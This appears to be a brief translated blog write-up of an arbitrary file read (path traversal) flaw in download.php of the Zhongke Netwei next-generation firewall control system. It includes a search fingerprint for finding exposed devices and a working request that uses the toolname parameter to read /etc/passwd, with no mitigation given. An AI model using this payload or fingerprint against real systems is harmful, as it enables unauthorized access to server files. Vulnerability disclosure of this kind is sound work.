Zhongke Netwei Next Generation Firewall Control System Download Php Arbitrary File Reading Vulnerability
Zhongke Netwei Next Generation Firewall Control System Download Php Arbitrary File Reading Vulnerability
Zhongke Netwei Next-generation firewall control system download.php arbitrary file reading vulnerability
Vulnerability Description
Zhongke Netwei Next-generation firewall control system download.php arbitrary file reading vulnerability, through which an attacker can read files on the server
Vulnerability Impact
Zhongke.com Next-generation firewall control system
Network surveying and mapping
body=”Get_Verify_Info(hex_md5(user_string).”
Vulnerability reappears
The login page is as follows
The vulnerability exists in download.php
Click any time and grab the package and change the toolname parameter
/download.php?&class=vpn&toolname=../../../../../../../../etc/passwd
##
This post is licensed under CC BY 4.0 by the author.